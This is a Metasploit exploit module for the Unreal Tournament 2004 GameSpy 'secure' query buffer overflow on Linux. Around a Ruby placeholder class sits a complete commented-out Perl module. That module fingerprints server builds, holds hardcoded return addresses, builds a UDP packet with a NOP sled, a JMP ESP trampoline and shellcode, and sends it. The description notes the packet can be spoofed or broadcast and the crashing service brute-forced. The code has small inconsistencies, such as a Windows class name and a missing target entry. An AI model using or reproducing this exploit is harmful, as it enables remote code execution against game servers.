require 'msf/core' module Msf class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)', 'Description' => %q{ This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times. }, 'Author' => [ 'onetwo' ], 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '7217'], [ 'BID', '10570'], [ 'MIL', '72'], ], 'Privileged' => true, 'Payload' => { 'Space' => 512, 'BadChars' => "\x5c\x00", }, 'Targets' => [ [ 'Automatic Targetting', { 'Platform' => 'linux', 'Ret' => 0x0, }, ], ], 'DisclosureDate' => 'Jun 18 2004', 'DefaultTarget' => 0)) end def exploit connect handler disconnect end =begin ## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::ut2004_secure_linux; use base "Msf::Exploit"; use strict; my $advanced = { }; my $info = { 'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)', 'Version' => '$Revision$', 'Authors' => [ 'onetwo', ], 'Arch' => [ 'x86' ], 'OS' => [ 'linux' ], 'Priv' => 1, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 7787], }, 'Payload' => { 'Space' => 512, 'BadChars' => "\x5c\x00", }, 'Description' => qq{ This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times. }, 'Refs' => [ ['OSVDB', '7217'], ['BID', '10570'], ['MIL', '72'], ], 'DefaultTarget' => 0, 'Targets' => [ ['UT2004 Linux Build Autodetect'], ['UT2004 Linux Build 3120', 0x0884a33b, 0x08963460], #JMP ESP , (free/realloc) BSS pointer ['UT2004 Linux Build 3186', 0x088c632f, 0x089eb2f0], ], 'Keys' => ['unreal2004'], 'DisclosureDate' => 'Jun 18 2004', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target_idx = $self->GetVar('TARGET'); my $target = $self->Targets->[$target_idx]; if (! $self->InitNops(128)) { $self->PrintLine("[*] Failed to initialize the nop module."); return; } my $request = $self->MakeNops(1024); if($target_idx == 0) # Autodetect and adjust payload accordingly... { my $versionNum = $self->GetVersion($target_host, $target_port); if(! $versionNum) { $self->PrintLine('[*] Could not obtain Version from host ' . $target_host . ':' . $target_port); $self->PrintLine('[*] Aborting...'); return; } elsif($versionNum == 3120) { $target = $self->Targets->[1]; } elsif ($versionNum == 3186) { $target = $self->Targets->[2]; } elsif ($versionNum == 3204) { $target = $self->Targets->[3]; } elsif (! $versionNum ) { $self->PrintLine('[*] No response from host'); $self->PrintLine('[*] Aborting...'); return; } else { $self->PrintLine('[*] Detected Version ' . $versionNum . ' on host ' . $target_host . ':' . $target_port . "isn't vulnerable to attack"); $self->PrintLine('[*] Aborting...'); return; } $self->PrintLine('[*] Detected Vulnerable Version ' . $versionNum . ' on host ' . $target_host . ':' . $target_port); $self->PrintLine('[*] Assembling Payload for version ' . $versionNum); } substr($request, 24, 4, pack('V', $target->[2] )); substr($request, 44, 4, pack('V', $target->[1] )); substr($request, 56, 4, pack('V', $target->[2] )); substr($request, 48, 6, "\x8d\x64\x24\x0c\xff\xe4"); #LEA/JMP substr($request, 0, length("\\secure\\"), "\\secure\\"); substr($request, length($request) - length($shellcode), length($shellcode), $shellcode); my $sock = Msf::Socket::Udp->new ( PeerAddr => $target_host, PeerPort => $target_port, ); if($sock->IsError) { $self->PrintLine('[*] Error creating socket: ' . $sock->GetError); return; } $self->PrintLine('[*] Sending UDP Secure Request (Dest Port: ' . $target_port . ') (' . length($request) . ' bytes)'); if(!$sock->Send($request)) { $sock->PrintError; return; } sleep(2); return; } sub Check { my $self = shift(); my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $versionNum = $self->GetVersion($target_host, $target_port); if(! $versionNum) { $self->PrintLine("[*] Couldn't detect Unreal Tournament Server at ". $target_host . ':' . $target_port); return $self->CheckCode('Generic'); } else { $self->PrintLine('[*] Detected Unreal Tournament Server Version: ' . $versionNum . ' at ' . $target_host . ':' . $target_port); if ($versionNum =~ /^(3120|3186|3204)$/) { $self->PrintLine("[*] The server is more than likely exploitable"); return $self->CheckCode('Appears'); } elsif ($versionNum =~ /^(2...)$/) { $self->PrintLine("[*] The server appears to be running UT2003"); return $self->CheckCode('Safe'); } $self->PrintLine("[*] The server is more than likely patched"); return $self->CheckCode('Safe'); } } sub GetVersion { my $self = shift(); my $target_host = shift(); my $target_port = shift(); my $s = Msf::Socket::Udp->new ( PeerAddr => $target_host, PeerPort => $target_port, ); if($s->IsError()) { $self->PrintLine('[*] Error creating socket: ' . $s->GetError); return; } $self->PrintLine('[*] Sending UDP Version Request to ' . $target_host . ':' . $target_port); my $versionRequest = "\\basic\\"; if(!$s->Send($versionRequest)) { $s->PrintError; return; } my $versionReply = $s->Recv(-1, 10); my $versionNum; if ($versionReply =~ m/\\gamever\\([0-9]{1,5})/) { $versionNum = $1; } return $versionNum; } 1; =end end end